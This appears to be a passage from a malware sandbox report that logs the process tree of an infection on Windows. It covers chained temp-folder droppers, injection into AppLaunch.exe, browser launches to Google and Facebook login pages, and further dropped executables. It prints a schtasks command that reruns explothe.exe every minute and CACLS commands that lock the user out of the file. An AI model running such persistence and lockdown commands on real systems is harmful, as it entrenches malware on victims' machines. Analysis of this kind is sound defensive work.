PID 2004 wrote to memory of 4684 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe
PID 2004 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe
PID 2004 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe
PID 2004 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe
PID 1796 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1796 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1796 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1796 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1796 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1796 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1796 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1796 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1796 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1796 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3184 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Uw30ar.exe
PID 3184 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Uw30ar.exe
PID 3184 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Uw30ar.exe
PID 4392 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Uw30ar.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4392 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Uw30ar.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4392 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Uw30ar.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4392 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Uw30ar.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4392 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Uw30ar.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4392 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Uw30ar.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1200 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Bh039GC.exe
PID 1200 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Bh039GC.exe
PID 1200 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Bh039GC.exe
PID 4748 wrote to memory of 3736 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Bh039GC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4748 wrote to memory of 3736 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Bh039GC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4748 wrote to memory of 3736 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Bh039GC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4748 wrote to memory of 3736 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Bh039GC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4748 wrote to memory of 3736 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Bh039GC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4748 wrote to memory of 3736 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Bh039GC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4748 wrote to memory of 3736 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Bh039GC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4748 wrote to memory of 3736 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Bh039GC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1088 wrote to memory of 4732 N/A C:\Users\Admin\AppData\Local\Temp\fd2fde4b51e79039d00b43f7cd00b31f.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5hl0oq6.exe
PID 1088 wrote to memory of 4732 N/A C:\Users\Admin\AppData\Local\Temp\fd2fde4b51e79039d00b43f7cd00b31f.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5hl0oq6.exe
PID 1088 wrote to memory of 4732 N/A C:\Users\Admin\AppData\Local\Temp\fd2fde4b51e79039d00b43f7cd00b31f.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5hl0oq6.exe
PID 4732 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5hl0oq6.exe C:\Windows\system32\cmd.exe
PID 4732 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5hl0oq6.exe C:\Windows\system32\cmd.exe
PID 760 wrote to memory of 1116 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 760 wrote to memory of 1116 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1116 wrote to memory of 4356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1116 wrote to memory of 4356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 760 wrote to memory of 2140 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 760 wrote to memory of 2140 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2140 wrote to memory of 4436 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2140 wrote to memory of 4436 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2140 wrote to memory of 4104 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2140 wrote to memory of 4104 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2140 wrote to memory of 4104 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2140 wrote to memory of 4104 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2140 wrote to memory of 4104 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2140 wrote to memory of 4104 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\fd2fde4b51e79039d00b43f7cd00b31f.exe

"C:\Users\Admin\AppData\Local\Temp\fd2fde4b51e79039d00b43f7cd00b31f.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1796 -ip 1796

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2308 -ip 2308

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 540

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1796 -s 572

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Uw30ar.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Uw30ar.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 584

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Bh039GC.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Bh039GC.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4748 -ip 4748

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4748 -s 572

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5hl0oq6.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5hl0oq6.exe

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\ABB1.tmp\ABB2.tmp\ABB3.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5hl0oq6.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffe3a4c46f8,0x7ffe3a4c4708,0x7ffe3a4c4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffe3a4c46f8,0x7ffe3a4c4708,0x7ffe3a4c4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,6203320225202508898,1414958446510668348,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,6203320225202508898,1414958446510668348,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,18095490293769840252,14731990622452921550,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,18095490293769840252,14731990622452921550,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2172,18095490293769840252,14731990622452921550,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2804 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,18095490293769840252,14731990622452921550,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,18095490293769840252,14731990622452921550,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,18095490293769840252,14731990622452921550,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3900 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,18095490293769840252,14731990622452921550,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4984 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,18095490293769840252,14731990622452921550,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4984 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,18095490293769840252,14731990622452921550,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,18095490293769840252,14731990622452921550,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4856 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,18095490293769840252,14731990622452921550,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3948 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,18095490293769840252,14731990622452921550,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5072 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\47F.exe

C:\Users\Admin\AppData\Local\Temp\47F.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oW6Zt8oj.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oW6Zt8oj.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\iO8uY9pP.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\iO8uY9pP.exe

C:\Users\Admin\AppData\Local\Temp\674.exe

C:\Users\Admin\AppData\Local\Temp\674.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\MR9kh3on.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\MR9kh3on.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1hY00JA7.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1hY00JA7.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YL1xJ1lt.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YL1xJ1lt.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\8D7.bat

"C:\Users\Admin\AppData\Local\Temp\8D7.bat"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5904 -ip 5904

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5904 -s 396

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9AF.tmp\9B0.tmp\9B1.bat C:\Users\Admin\AppData\Local\Temp\8D7.bat"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3544 -ip 3544

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 228 -ip 228

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3544 -s 600

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 228 -s 540

C:\Users\Admin\AppData\Local\Temp\C04.exe

C:\Users\Admin\AppData\Local\Temp\C04.exe

C:\Users\Admin\AppData\Local\Temp\CF0.exe

C:\Users\Admin\AppData\Local\Temp\CF0.exe

C:\Users\Admin\AppData\Local\Temp\E87.exe

C:\Users\Admin\AppData\Local\Temp\E87.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5616 -ip 5616

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5616 -s 404

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe3a4c46f8,0x7ffe3a4c4708,0x7ffe3a4c4718

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Ow203LP.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Ow203LP.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,18095490293769840252,14731990622452921550,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5828 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffe3a4c46f8,0x7ffe3a4c4708,0x7ffe3a4c4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,18095490293769840252,14731990622452921550,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4832 /prefetch:1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\564F.exe

C:\Users\Admin\AppData\Local\Temp\564F.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\source1.exe

"C:\Users\Admin\AppData\Local\Temp\source1.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

